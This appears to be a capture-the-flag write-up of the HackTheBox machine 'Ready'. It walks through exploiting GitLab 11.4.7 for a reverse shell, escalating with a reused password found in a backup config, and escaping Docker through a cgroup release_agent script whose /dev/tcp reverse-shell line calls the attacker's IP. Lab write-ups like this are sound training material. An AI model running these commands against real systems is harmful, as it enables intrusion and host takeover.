Hey guys, I'm back with another easy HackTheBox box write-up (well it's actually medium rated but easy it was).
First, let's scan for open ports :
nmap -A -T4 -p- 10.10.10.220 | tee scan.txt
- -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
- -p- : nmap scans every port
- -T4 : allows you to adjust the Timing Template (according to your bandwidth, and the speed you're seeking)
The interesting thing to notice is that there is no website available on port 80 which's usually the case. But there is one hosted on port 5080.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-28 16:11 CET Nmap scan report for ready.htb (10.10.10.220) Host is up (0.016s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 5080/tcp open http nginx | http-robots.txt: 53 disallowed entries (15 shown) | / /autocomplete/users /search /api /admin /profile | /dashboard /projects/new /groups/new /groups/*/edit /users /help |_/s/ /snippets/new /snippets/*/edit | http-title: Sign in \xC2\xB7 GitLab |_Requested resource was http://ready.htb:5080/users/sign_in |_http-trane-info: Problem with XML parsing of /evox/about Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 66.07 seconds
You'll get the following connection form. It will bring some memories up for some of you 😉
If you created an account, and go to the help section you'll learn about the GitLab version that is used : 11.4.7. You'll notice in some cases a little red label stating "update asap". It's a good clue 🙂
After some short googling, I found this python script that exploits a known CVE on this particular version.
┌─|Log_s [00:00] :~/Cyber/chall/machines/Ready └──╼ $ python3 gitlab_rce.py http://10.10.10.220:5080 10.10.14.239 Start a listener on port 42069 and hit enter (nc -vlnp 42069)
Start a listener in another terminal on port 42069 as prompted an hit enter.
$ rlwrap nc -lvp 42069 listening on [any] 42069 ... connect to [10.10.14.239] from ready.htb [10.10.10.220] 57814 bash: cannot set terminal process group (518): Inappropriate ioctl for device bash: no job control in this shell [email protected]:~/gitlab-rails/working$
Here we go for the foothold.
You automatically get the user by doing
( told you it wasn't hard).
This part is a little bit more tricky if you don't understand you're environment. You will often find software like GitLab running in a docker container, but if to be sure you can simply run LinPEAS.sh or LinEnum.sh. It will notify you if it detects being run in a docker.
I rapidly found a way to escape a docker, if the docker is running as root, and if you're root inside the docker (which we're currently not). So with that cleared, all we have to do is privesc to root in our current environment.
After some regular enumeration work, you'll find what you need in a backup file :
cat /opt/backup/gitlab.rb | grep password
The admin is a password reuser (oooooh bad boy), so this line is interesting :
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
Let's pop a real shell and try to connect as root :
@gitlab:/home/dude$ python3 -c "import pty;pty.spawn('/bin/bash')" python3 -c "import pty;pty.spawn('/bin/bash')" [email protected]:/home/dude$ su root su root Password: wW59U!ZKMbG9+*#h [email protected]:/home/dude# id id uid=0(root) gid=0(root) groups=0(root)
The final step is to escape the docker. Here is a simple way that works here. Create the
/tmp/cgrp folder. Create a bash script with the following content and run it (don't forget to replace my info with your own IP and PORT).
#! /bin/bash mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent #Reverse shell echo '#!/bin/bash' > /cmd echo "bash -i >& /dev/tcp/10.10.14.239/9999 0>&1" >> /cmd chmod a+x /cmd sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" head /output
Finally, listen on the right port and run the script !
$ rlwrap nc -lvp 9999 listening on [any] 9999 ... connect to [10.10.14.239] from ready.htb [10.10.10.220] 59432 bash: cannot set terminal process group (-1): Inappropriate ioctl for device bash: no job control in this shell [email protected]:/# id id uid=0(root) gid=0(root) groups=0(root)
Now a simple
cat /root/root.txt will do the trick.
I hope you enjoyed, and see you for another write-up 😉